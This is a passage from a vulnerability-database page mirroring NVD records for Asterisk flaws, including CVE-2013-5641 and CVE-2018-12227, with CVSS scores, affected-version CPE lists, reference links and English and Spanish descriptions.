        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-11-09T00:29:00.473",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-010.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/101760"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27337"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/101760"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27337"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2013-09-09 17:55

Modified

2024-11-21 01:57

Severity ?

Summary

The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.

References

URL	Tags
cve@mitre.org	http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2013-004.html	Patch
cve@mitre.org	http://osvdb.org/96691
cve@mitre.org	http://seclists.org/bugtraq/2013/Aug/185	Patch
cve@mitre.org	http://secunia.com/advisories/54534	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/54617
cve@mitre.org	http://www.debian.org/security/2013/dsa-2749
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223
cve@mitre.org	http://www.securityfocus.com/bid/62021
cve@mitre.org	http://www.securitytracker.com/id/1028956
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-21064	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2013-004.html	Patch
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/96691
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/bugtraq/2013/Aug/185	Patch
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/54534	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/54617
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2013/dsa-2749
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/62021
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1028956
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-21064	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1224686C-8A1E-40E1-ACB9-87F571641EAD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B63FB1C5-9704-4C6A-8DE6-2283D1993BA3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DE14D16B-4903-47BD-BCBD-28A8B6B878E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6DDE265-B4B9-495A-95F7-0910E8199980",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6B7AE7FB-8170-41AD-9597-07335D36AE48",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9131FB32-E3F0-476C-A0D1-36E2101631D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5209356B-4A86-4C93-9D04-C66969F23BC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9AF5750B-2348-4E35-9F08-27E2385E329F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0344FE7-952A-4BC5-A31F-F2C5EABDB5FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "960521C4-9004-4412-8A38-66240C4B875D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "00F26342-110F-4163-AD11-98AA3B71D299",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8652FA73-2F02-401C-890F-0544276294D3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel.  NOTE: some of these details are obtained from third party information."
    },
    {
      "lang": "es",
      "value": "El controlador de canal SIP (channel/chan_sip.c) en Asterisk Open Source 1.8.17.x hasta 1.8.22.x, 1.8.23.x (anteriores a 1.8.23.1), y 11.x (anteriores a 11.5.1); y Certified Asterisk 1.8.15 (anteriores a 1.8.15-cert3) y 11.2 (anteriores a 11.2-cert2) permiten a un atacante remoto  causar una denegaci\u00f3n de servicio (referencia a puntero nulo, corrupci\u00f3n de memoria y ca\u00edda del demonio) a trav\u00e9s de un ACK con SDP a un canal previamente cerrado. \n\nNOTA: algunos de estos detalles fueron obtenidos de informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2013-5641",
  "lastModified": "2024-11-21T01:57:51.903",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-09-09T17:55:06.237",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-004.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/96691"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://seclists.org/bugtraq/2013/Aug/185"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/54534"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/54617"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2013/dsa-2749"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/62021"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1028956"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-21064"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/96691"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://seclists.org/bugtraq/2013/Aug/185"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/54534"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/54617"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2013/dsa-2749"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/62021"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1028956"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-21064"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-06-12 04:29

Modified

2024-11-21 03:44

Severity ?

5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary

An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2018-008.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/104455	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27818	Patch, Vendor Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201811-11	Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2018-008.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/104455	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27818	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201811-11	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2018/dsa-4320	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.21
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "85FB9D68-8BEE-40F5-8175-DC62C0EAFE8F",
              "versionEndExcluding": "13.21.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "33B74E57-BD3C-4C54-A27C-F32DEF133390",
              "versionEndExcluding": "14.7.7",
              "versionStartExcluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "41536B2F-2D75-406D-95CC-64889838F0B1",
              "versionEndExcluding": "15.4.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "05795EED-0473-4806-A9AD-FD92212CCC77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "C3F701AA-E842-4680-9747-000C3A4F6E4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "4B0FC294-F910-491B-9DEF-9FFEACA208C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "B7EE2BD3-51DC-4DA5-A5F2-6275F5277BE7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en Asterisk Open Source en versiones 13.x anteriores a la 13.21.1; versiones 14.x anteriores a la 14.7.7 y las versiones 15.x anteriores a la 15.4.1, as\u00ed como Certified Asterisk en versiones 13.18-cert anteriores a la 13.18-cert4 y 13.21-cert anteriores a la 13.21-cert2. Cuando las reglas de lista de control de acceso (ACL) espec\u00edficas del endpoint bloquean una petici\u00f3n SIP, responden con un mensaje de error 403 prohibido. Sin embargo, si no se identifica un endpoint, se env\u00eda una respuesta 401 no autorizada. Esta vulnerabilidad s\u00f3lo revela qu\u00e9 peticiones llegan a un endpoint definido. Las reglas de lista de control de acceso (ACL) no pueden omitirse para obtener acceso a los endpoints revelados."
    }
  ],
  "id": "CVE-2018-12227",
  "lastModified": "2024-11-21T03:44:49.003",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
